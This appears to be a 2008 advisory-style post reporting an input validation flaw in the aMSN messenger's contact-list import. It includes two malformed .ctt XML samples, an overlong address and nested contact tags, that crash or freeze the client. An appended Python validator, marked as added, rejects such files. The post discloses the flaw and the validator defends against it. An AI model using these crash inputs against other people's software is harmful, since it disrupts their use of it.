aMSN Input Validation Error

January 26, 2008

Risk: Low
Typology: Input Validation Error

All aMSN versions, on both Windows and Linux platforms.

Like Microsoft MSN, aMSN has a nice feature for exporting and importing your list of
contacts.

This list is dumped into an XML file (file extension .ctt) with this structure:

——————————————————————-
<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact> your_contact@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
——————————————————————–

aMSN does not correctly validate the contacts you insert; more precisely, it does not parse
the format of this file, and when you import a malformed contact list it suddenly
shuts down.

Here is an example of a malformed input list:

——————————————————————-
<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy</contact>
</contactlist>
</service>
</messenger>
——————————————————————-

Another possibility:

——————————————————————-
<?xml version="1.0"?>
<messenger>
<service name=".NET Messenger Service">
<contactlist>
<contact><contact><contact><contact><contact></contact></contact><contact></contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
——————————————————————-

This will cause aMSN to freeze.

If you use the same "trick" with MS Messenger, a MessageBox will advise you of the malformed
file 😉
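
The check an importer needs before trusting a .ctt file, written as an added example (it is not aMSN code and not part of the original post; aMSN itself is written in Tcl, Python is used here for illustration). The function name, the size and length caps and the address pattern are assumptions; the sample documents are constructed from the structure shown above.

```python
import re
import xml.etree.ElementTree as ET

MAX_FILE_BYTES = 1_000_000  # assumed cap on the size of an import file
MAX_ADDR_LEN = 254          # assumed cap on the length of one contact address
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


class ContactListError(ValueError):
    """Raised for a rejected .ctt file so the caller can show a message box."""


def parse_ctt(data: bytes) -> list[str]:
    """Return the addresses in a .ctt document or raise ContactListError."""
    if len(data) > MAX_FILE_BYTES:
        raise ContactListError("file too large")
    # Cheap pre-filter: a contact list has no use for DTDs or entities.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        raise ContactListError("DTDs and entities are not allowed")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:  # e.g. unbalanced <contact> tags
        raise ContactListError(f"not well-formed XML: {exc}") from exc
    if root.tag != "messenger":
        raise ContactListError("root element must be <messenger>")
    contacts = []
    for contact in root.findall("./service/contactlist/contact"):
        if len(contact):  # any child element, such as a nested <contact>
            raise ContactListError("<contact> must not contain elements")
        addr = (contact.text or "").strip()
        if len(addr) > MAX_ADDR_LEN:
            raise ContactListError("contact address too long")
        if not ADDR_RE.fullmatch(addr):
            raise ContactListError("contact is not a valid address")
        contacts.append(addr)
    return contacts


def _doc(body: str) -> bytes:
    """Wrap a constructed <contactlist> body in the .ctt structure."""
    return ('<?xml version="1.0"?><messenger>'
            '<service name=".NET Messenger Service">'
            f'<contactlist>{body}</contactlist></service></messenger>').encode()


# Constructed samples: one valid list and three malformed ones.
GOOD = _doc("<contact> your_contact@xxxx.yy</contact>")
LONG = _doc("<contact>" + "A" * 300 + "@xxxx.yy</contact>")
NESTED = _doc("<contact><contact></contact></contact>")
UNBALANCED = _doc("<contact></contact></contact>")
```

Every rejection surfaces as a single exception type, so the import dialog can report the malformed file and leave the existing contact list untouched.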

See you in the next post.